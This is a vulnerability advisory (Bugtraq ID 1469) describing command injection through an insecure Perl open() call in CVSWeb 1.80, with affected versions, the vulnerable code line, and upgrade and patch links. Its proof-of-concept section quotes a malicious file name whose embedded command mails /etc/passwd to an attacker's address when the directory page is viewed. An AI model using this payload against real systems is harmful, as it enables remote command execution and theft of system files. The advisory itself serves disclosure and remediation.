BID:1469

CVSWeb insecure perl "open" Vulnerability

Info

CVSWeb insecure perl "open" Vulnerability

Bugtraq ID:	1469
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	Yes
Published:	Jul 12 2000 12:00AM
Updated:	Jul 12 2000 12:00AM
Credit:	Posted to BugTraq on July 12, 2000 by Joey Hess <[email protected]>
Vulnerable:	CVSWeb Developer CVSWeb 1.80 - Debian Linux 2.3 - FreeBSD FreeBSD 5.0 - FreeBSD FreeBSD 4.0 - FreeBSD FreeBSD 3.5 - FreeBSD FreeBSD 3.4 - FreeBSD FreeBSD 3.3 - FreeBSD FreeBSD 3.2 - Mandriva Linux Mandrake 7.1 - Microsoft IIS 5.0 - Redhat Linux 6.2 sparc - Redhat Linux 6.2 i386 - Redhat Linux 6.2 alpha - Redhat Linux 6.1 sparc - Sun Solaris 8_x86 - Sun Solaris 8_sparc - SuSE Linux 7.0 - Turbolinux Turbolinux 6.1 - Turbolinux Turbolinux 6.0.5 - Turbolinux Turbolinux Server 6.5

Not Vulnerable:	CVSWeb Developer CVSWeb 1.89 - Debian Linux 2.3 - FreeBSD FreeBSD 5.0 alpha - FreeBSD FreeBSD 5.0 - FreeBSD FreeBSD 4.0 alpha - FreeBSD FreeBSD 4.0 - Microsoft IIS 5.0 - Redhat Linux 6.2 sparc - Redhat Linux 6.2 i386 - Redhat Linux 6.2 alpha - Sun Solaris 8_x86 - Sun Solaris 8_sparc - SuSE Linux 7.0 CVSWeb Developer CVSWeb 1.86 - Debian Linux 2.3 - FreeBSD FreeBSD 5.0 alpha - FreeBSD FreeBSD 5.0 - FreeBSD FreeBSD 4.0 alpha - FreeBSD FreeBSD 4.0 - Microsoft IIS 5.0 - Redhat Linux 6.2 sparc - Redhat Linux 6.2 i386 - Redhat Linux 6.2 alpha - Sun Solaris 8_x86 - Sun Solaris 8_sparc - SuSE Linux 7.0

Discussion

CVSWeb insecure perl "open" Vulnerability

Cvsweb 1.80 makes an insecure call to the perl OPEN function, providing attackers with write access to a cvs repository the ability to execute arbitrary commands on the host machine. The code that is being exploited here is the following: open($fh, "rlog '$filenames' 2>/dev/null |")

Exploit / POC

CVSWeb insecure perl "open" Vulnerability

From BugTraq Post:
An attack looks something like this:

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE

Then the attacker either visits the cvsweb page that is a directory listing for the directory they put the trojan file in, or they wait for someone else to do the same. Views of this page cause the command to be executed, mailing /etc/passwd to the attacker or [insert something more nasty here].

Solution / Fix

CVSWeb insecure perl "open" Vulnerability

Solution:
Upgrade to at least version 1.86 available from http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/

Debian:
Fixed in: Debian 2.1 (slink):
Source:
http://security.debian.org/dists/slink/updates/source/cvsweb_109.dsc
http://security.debian.org/dists/slink/updates/source/cvsweb_109.tar.gz
Architecture-independent binary:
http://security.debian.org/dists/slink/updates/binary-all/cvsweb_109_all.deb
Debian 2.2 (potato):
Source:
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79-3potato1.diff.gz
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79-3potato1.dsc
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79.orig.tar.gz
Architecture-independent binary:
http://http.us.debian.org/debian/dists/potato/main/binary-all/devel/cvsweb_1.79-3potato1.deb

CVSWeb Developer CVSWeb 1.80

TurboLinux cvsweb-1.93-1.noarch.rpm
MD5 checksum: a9983e6d1fa2fae00f136a0b9c1708a2GPG Key for signature verification: http://www.turbolinux.com/security/tlgpgkey.ascTo verify a package: rpm --checksig name_of_rpmTo verify MD5 checksum: rpm --checksig --nogpg name_of_rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/cvsweb-1.93-1.noarch .rpm

References

CVSWeb insecure perl "open" Vulnerability

References: